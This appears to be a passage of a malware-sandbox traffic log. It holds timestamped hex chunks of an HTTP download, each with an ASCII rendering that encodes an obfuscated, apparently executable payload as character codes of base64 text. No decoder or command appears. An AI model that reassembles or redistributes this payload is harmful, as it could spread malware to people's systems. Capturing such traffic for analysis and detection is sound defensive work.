                                                                                              2021-09-27 18:27:27 UTC1259INData Raw: 36 20 30 20 31 31 33 20 30 20 38 38 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 36 35 20 30 20 38 37 20 30 20 38 36 20 30 20 31 30 38 20 30 20 34 38 20 30 20 37 32 20 30 20 35 32 20 30 20 31 31 38 20 30 20 37 32 20 30 20 35 34 20 30 20 31 32 30 20 30 20 35 30 20 30 20 36 38 20 30 20 31 31 39 20 30 20 38 32 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 37 35 20 30 20 37 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 35 20 30 20 38 34 20 30 20 39 37 20 30 20 31 30 33 20 30 20 31 31 32 20 30 20 38 37 20 30 20 34 37 20 30 20 35 35 20 30 20 36 39 20 30 20 39 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35
                                                                                              Data Ascii: 6 0 113 0 88 0 70 0 102 0 111 0 109 0 65 0 103 0 65 0 65 0 73 0 88 0 65 0 87 0 86 0 108 0 48 0 72 0 52 0 118 0 72 0 54 0 120 0 50 0 68 0 119 0 82 0 68 0 111 0 119 0 75 0 72 0 47 0 47 0 43 0 115 0 84 0 97 0 103 0 112 0 87 0 47 0 55 0 69 0 99 0 66 0 65 0 65
                                                                                              2021-09-27 18:27:27 UTC1275INData Raw: 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 31 30 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 30 39 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 30 38 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 30 37 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 30 36 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 31 31 34 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20
                                                                                              Data Ascii: 80 0 56 0 108 0 110 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 109 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 108 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 107 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 106 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 114 0 77 0 74 0 65 0 65 0 80
                                                                                              2021-09-27 18:27:27 UTC1291INData Raw: 31 30 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 31 20 30 20 36 35 20 30 20 38 35 20 30 20 31 30 33 20 30 20 36 36 20 30 20 34 39 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 37 20 30 20 36 35 20 30 20 38 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 35 32 20 30 20 36 35 20 30 20 37 30 20 30 20 37 33 20 30 20 36 35 20 30 20 38 36 20 30 20 36 35 20 30 20 36 36 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 31 39 20 30 20 36 36 20 30 20 37 34 20 30 20 36 35 20 30 20 36 39 20 30 20 35 32 20 30 20 36 35 20 30 20 37 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 38 33 20 30 20 36 35 20 30
                                                                                              Data Ascii: 108 0 65 0 71 0 81 0 65 0 85 0 103 0 66 0 49 0 65 0 71 0 52 0 65 0 65 0 65 0 66 0 88 0 65 0 69 0 107 0 65 0 84 0 103 0 65 0 52 0 65 0 70 0 73 0 65 0 86 0 65 0 66 0 78 0 65 0 65 0 65 0 65 0 86 0 119 0 66 0 74 0 65 0 69 0 52 0 65 0 78 0 119 0 66 0 83 0 65 0
                                                                                              2021-09-27 18:27:27 UTC1307INData Raw: 20 36 35 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 37 30 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 31 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 37 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20
                                                                                              Data Ascii: 65 0 66 0 115 0 65 0 71 0 119 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 119 0 65 0 65 0 65 0 66 0 70 0 65 0 72 0 73 0 65 0 99 0 103 0 66 0 118 0 65 0 72 0 73 0 65 0 73 0 65 0 65 0 108 0 65 0 71 0 81 0 65 0 79 0 103 0 65 0 103 0 65 0 67 0 85 0 65 0 99 0 119 0
                                                                                              2021-09-27 18:27:27 UTC1323INData Raw: 20 38 31 20 30 20 36 36 20 30 20 31 31 30 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 31 20 30 20 36 35 20 30 20 38 32 20 30 20 38 31 20 30 20 36 36 20 30 20 36 36 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 30 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 36 20 30 20 31 30 33 20
                                                                                              Data Ascii: 81 0 66 0 110 0 65 0 71 0 107 0 65 0 99 0 119 0 66 0 48 0 65 0 71 0 85 0 65 0 99 0 103 0 66 0 122 0 65 0 68 0 111 0 65 0 73 0 65 0 65 0 78 0 65 0 65 0 111 0 65 0 82 0 81 0 66 0 66 0 65 0 70 0 103 0 65 0 80 0 81 0 65 0 108 0 65 0 68 0 103 0 65 0 76 0 103
                                                                                              2021-09-27 18:27:27 UTC1339INData Raw: 20 31 31 34 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 37 33 20 30 20 35 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 31 31 37 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 36 38 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 35 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 37 20 30 20 37 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 35 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 33 20 30 20 35 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20 37 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 36 20 30 20 38 34 20 30 20 31 30 38
                                                                                              Data Ascii: 114 0 111 0 65 0 65 0 68 0 73 0 54 0 65 0 65 0 65 0 72 0 117 0 85 0 65 0 65 0 68 0 68 0 108 0 65 0 65 0 65 0 43 0 53 0 81 0 65 0 65 0 87 0 79 0 85 0 65 0 65 0 71 0 55 0 108 0 65 0 65 0 67 0 73 0 53 0 81 0 65 0 65 0 112 0 79 0 85 0 65 0 65 0 76 0 84 0 108
                                                                                              2021-09-27 18:27:27 UTC1355INData Raw: 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 38 31 20 30 20 35 31 20 30 20 37 34 20 30 20 31 30 38 20 30 20 38 39 20 30 20 38 38 20 30 20 38 32 20 30 20 31 30 38 20 30 20 38 36 20 30 20 37 31 20 30 20 35 37 20 30 20 31 31 38 20 30 20 39 38 20 30 20 37 31 20 30 20 31 30 34 20 30 20 31 30 38 20 30 20 39 38 20 30 20 37 32 20 30 20 36 35 20 30 20 31 32 32 20 30 20 37 37 20 30 20 31 30 38 20 30 20 37 38 20 30 20 31 31 37 20 30 20 38 39 20 30 20 38 38 20 30 20 36 36 20 30 20 31 32 32 20 30 20 39 37 20 30 20 37 31 20 30 20 35 37 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 33 20 30 20 36 35 20 30 20 36 39 20 30 20 37 38 20 30 20 31 32 31 20 30 20 39 30 20 30 20 38 37 20 30 20 37 30
                                                                                              Data Ascii: 0 99 0 65 0 65 0 72 0 73 0 65 0 81 0 51 0 74 0 108 0 89 0 88 0 82 0 108 0 86 0 71 0 57 0 118 0 98 0 71 0 104 0 108 0 98 0 72 0 65 0 122 0 77 0 108 0 78 0 117 0 89 0 88 0 66 0 122 0 97 0 71 0 57 0 48 0 65 0 65 0 66 0 113 0 65 0 69 0 78 0 121 0 90 0 87 0 70
                                                                                              2021-09-27 18:27:27 UTC1371INData Raw: 30 20 36 35 20 30 20 35 36 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 35 36 20 30 20 38 30 20 30 20 36 35 20 30 20 36 35 20 30 20 35 36 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 36 35 20 30 20 38 30 20 30 20 37 32 20 30 20 38 38 20 30 20 31 32 30 20 30 20 37 37 20 30 20 31 32 32 20 30 20 36 37 20 30 20 31 32 32 20 30 20 37 37 20 30 20 31 31 38 20 30 20 37 38 20 30 20 34 33 20 30 20 31 31 36 20 30 20 35 35 20 30 20 36 39 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 37 35 20 30 20 38 37 20 30 20 31 30 35 20 30 20 37 34 20 30 20 37 39 20 30 20 38 33 20 30 20 31 31 34 20 30 20 31 31 33 20 30 20 31 30 36 20 30 20 31 30
                                                                                              Data Ascii: 0 65 0 56 0 80 0 68 0 47 0 65 0 80 0 47 0 47 0 56 0 65 0 68 0 47 0 56 0 80 0 65 0 65 0 56 0 80 0 68 0 47 0 65 0 80 0 72 0 88 0 120 0 77 0 122 0 67 0 122 0 77 0 118 0 78 0 43 0 116 0 55 0 69 0 104 0 100 0 75 0 87 0 105 0 74 0 79 0 83 0 114 0 113 0 106 0 10
                                                                                              2021-09-27 18:27:27 UTC1387INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20
                                                                                              Data Ascii: 5 0 65 0 65 0 65 0 66 0 119 0 65 0 65 0 65 0 67 0 103 0 65 0 65 0 65 0 65 0 103 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 69 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                                                                                              2021-09-27 18:27:27 UTC1403INData Raw: 31 31 30 20 30 20 38 33 20 30 20 38 32 20 30 20 31 32 30 20 30 20 35 33 20 30 20 38 36 20 30 20 35 35 20 30 20 31 32 31 20 30 20 35 33 20 30 20 39 30 20 30 20 34 38 20 30 20 31 32 30 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 31 31 33 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 31 31 32 20 30 20 35 34 20 30 20 34 38 20 30 20 39 37 20 30 20 36 37 20 30 20 37 32 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 31 31 36 20 30 20 34 37 20 30 20 35 37 20 30 20 37 39 20 30 20 31 31 32 20 30 20 34 37 20 30 20 35 36 20 30 20 35 34 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 38 36 20 30 20 36 36 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20
                                                                                              Data Ascii: 110 0 83 0 82 0 120 0 53 0 86 0 55 0 121 0 53 0 90 0 48 0 120 0 111 0 116 0 113 0 122 0 112 0 112 0 54 0 48 0 97 0 67 0 72 0 47 0 57 0 87 0 116 0 47 0 57 0 79 0 112 0 47 0 56 0 54 0 103 0 103 0 86 0 66 0 78 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 112 0
                                                                                              2021-09-27 18:27:27 UTC1419INData Raw: 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 35 36 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 32 20 30 20 31 32 31 20 30 20 34 37 20 30 20 34 37 20 30 20 39 38 20 30 20 31 31 37 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 38 36 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20 31 30 39 20 30 20 31 32 30 20 30 20 39 37 20 30 20 31 30 33 20 30 20 38 34 20 30 20 38 31 20 30
                                                                                              Data Ascii: 47 0 47 0 47 0 47 0 47 0 47 0 47 0 55 0 56 0 47 0 47 0 102 0 121 0 47 0 47 0 98 0 117 0 110 0 109 0 86 0 89 0 110 0 109 0 86 0 89 0 110 0 109 0 86 0 89 0 110 0 109 0 86 0 89 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 112 0 109 0 120 0 97 0 103 0 84 0 81 0
                                                                                              2021-09-27 18:27:27 UTC1435INData Raw: 39 30 20 30 20 39 37 20 30 20 31 31 37 20 30 20 31 31 33 20 30 20 37 30 20 30 20 37 30 20 30 20 35 30 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 31 30 34 20 30 20 38 32 20 30 20 31 30 36 20 30 20 35 36 20 30 20 37 33 20 30 20 37 33 20 30 20 38 35 20 30 20 39 30 20 30 20 31 30 32 20 30 20 36 37 20 30 20 31 31 33 20 30 20 31 30 35 20 30 20 36 35 20 30 20 37 36 20 30 20 34 37 20 30 20 31 32 32 20 30 20 35 37 20 30 20 37 32 20 30 20 38 30 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 31 30 31 20 30 20 35 36 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20
                                                                                              Data Ascii: 90 0 97 0 117 0 113 0 70 0 70 0 50 0 102 0 119 0 103 0 104 0 82 0 106 0 56 0 73 0 73 0 85 0 90 0 102 0 67 0 113 0 105 0 65 0 76 0 47 0 122 0 57 0 72 0 80 0 47 0 57 0 88 0 101 0 56 0 80 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47
                                                                                              2021-09-27 18:27:27 UTC1451INData Raw: 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20
                                                                                              Data Ascii: 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 47 0 114 0
                                                                                              2021-09-27 18:27:27 UTC1467INData Raw: 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 36 35 20 30 20 38 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 35 32 20 30 20 36 35 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 35 36 20 30 20 36 35 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 33 20 30 20 31 30 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36
                                                                                              Data Ascii: 0 56 0 65 0 65 0 80 0 65 0 80 0 65 0 65 0 68 0 103 0 66 0 119 0 65 0 65 0 52 0 65 0 99 0 65 0 65 0 79 0 65 0 72 0 65 0 65 0 68 0 103 0 66 0 119 0 65 0 65 0 56 0 65 0 56 0 65 0 65 0 80 0 103 0 102 0 65 0 65 0 68 0 56 0 80 0 119 0 65 0 65 0 47 0 47 0 56 0 6
                                                                                              2021-09-27 18:27:27 UTC1483INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 35 20 30 20 37 39 20 30 20 37 33 20 30 20 36 36 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 35 32 20 30 20 36 35 20 30 20 35 35 20 30 20 31 30 33 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 37 20 30 20 35 32 20 30 20 36 35 20 30 20 37 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                                                                                              Data Ascii: 5 0 65 0 65 0 65 0 66 0 85 0 79 0 73 0 66 0 66 0 119 0 65 0 84 0 65 0 65 0 52 0 65 0 55 0 103 0 77 0 65 0 65 0 80 0 47 0 47 0 103 0 65 0 65 0 117 0 65 0 67 0 52 0 65 0 76 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 6
                                                                                              2021-09-27 18:27:27 UTC1499INData Raw: 20 31 30 34 20 30 20 36 35 20 30 20 37 31 20 30 20 37 33 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 38 31 20 30 20 36 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 36 20 30 20 36 35 20 30 20 38 32 20 30 20 31 31 39 20 30 20 36 36 20 30 20 38 35 20 30 20 38 31 20 30 20 36 38 20 30 20 35 36 20 30 20 36 35 20 30 20
                                                                                              Data Ascii: 104 0 65 0 71 0 73 0 65 0 98 0 65 0 66 0 108 0 65 0 72 0 77 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 68 0 65 0 67 0 70 0 81 0 68 0 119 0 65 0 76 0 65 0 82 0 119 0 66 0 85 0 81 0 68 0 56 0 65 0
                                                                                              2021-09-27 18:27:27 UTC1515INData Raw: 34 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 38 31 20 30 20 36 36 20 30 20 37 38 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 31 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 35 34 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20
                                                                                              Data Ascii: 4 0 81 0 66 0 112 0 65 0 71 0 52 0 65 0 97 0 81 0 66 0 116 0 65 0 71 0 107 0 65 0 101 0 103 0 66 0 108 0 65 0 71 0 81 0 65 0 67 0 81 0 66 0 78 0 65 0 71 0 69 0 65 0 101 0 65 0 66 0 112 0 65 0 71 0 48 0 65 0 97 0 81 0 66 0 54 0 65 0 71 0 85 0 65 0 90 0 65
                                                                                              2021-09-27 18:27:27 UTC1531INData Raw: 31 30 30 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 39 37 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 37 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 39 20 30 20 38 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 33
                                                                                              Data Ascii: 100 0 81 0 65 0 103 0 65 0 71 0 77 0 65 0 97 0 65 0 66 0 118 0 65 0 71 0 56 0 65 0 99 0 119 0 66 0 108 0 65 0 67 0 52 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 111 0 65 0 66 0 81 0 65 0 66 0 65 0 69 0 89 0 65 0 97 0 81 0 66 0 115 0 65 0 71 0 85 0 65 0 86 0 103
                                                                                              2021-09-27 18:27:27 UTC1547INData Raw: 20 30 20 31 31 33 20 30 20 31 31 36 20 30 20 37 37 20 30 20 31 31 37 20 30 20 31 31 36 20 30 20 31 30 37 20 30 20 31 32 31 20 30 20 35 30 20 30 20 31 31 31 20 30 20 39 37 20 30 20 34 33 20 30 20 31 30 38 20 30 20 37 37 20 30 20 35 31 20 30 20 38 39 20 30 20 36 36 20 30 20 31 31 33 20 30 20 35 34 20 30 20 31 32 32 20 30 20 31 31 30 20 30 20 31 30 34 20 30 20 38 33 20 30 20 31 32 32 20 30 20 35 36 20 30 20 35 34 20 30 20 38 36 20 30 20 31 32 32 20 30 20 31 30 35 20 30 20 35 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 32 31 20 30 20 31 31 37 20 30 20 37 33 20 30 20 38 36 20 30 20 31 31 31 20 30 20 37 39 20 30 20 36 39 20 30 20 39 37 20 30 20 35 35 20 30 20 31 30 36 20 30 20 36 37 20 30 20 35 30 20 30 20 36 37 20 30 20 35 35 20 30 20 37 36 20 30 20 36 36 20
                                                                                              Data Ascii: 0 113 0 116 0 77 0 117 0 116 0 107 0 121 0 50 0 111 0 97 0 43 0 108 0 77 0 51 0 89 0 66 0 113 0 54 0 122 0 110 0 104 0 83 0 122 0 56 0 54 0 86 0 122 0 105 0 53 0 47 0 43 0 121 0 117 0 73 0 86 0 111 0 79 0 69 0 97 0 55 0 106 0 67 0 50 0 67 0 55 0 76 0 66
                                                                                              2021-09-27 18:27:27 UTC1563INData Raw: 20 30 20 38 30 20 30 20 35 31 20 30 20 31 31 39 20 30 20 38 34 20 30 20 31 31 37 20 30 20 38 30 20 30 20 31 30 35 20 30 20 34 33 20 30 20 37 33 20 30 20 37 39 20 30 20 35 37 20 30 20 39 39 20 30 20 31 31 34 20 30 20 31 31 34 20 30 20 37 36 20 30 20 38 30 20 30 20 38 34 20 30 20 31 31 34 20 30 20 31 31 37 20 30 20 35 36 20 30 20 37 30 20 30 20 35 32 20 30 20 38 38 20 30 20 31 30 37 20 30 20 31 30 39 20 30 20 31 30 34 20 30 20 31 31 36 20 30 20 31 32 31 20 30 20 37 31 20 30 20 37 32 20 30 20 35 33 20 30 20 31 31 32 20 30 20 31 31 38 20 30 20 36 39 20 30 20 31 31 33 20 30 20 36 37 20 30 20 31 30 33 20 30 20 31 31 37 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 38 33 20 30 20 31 30 31 20 30 20 35 35 20 30 20 31 31 32 20 30 20 31 30 33 20 30
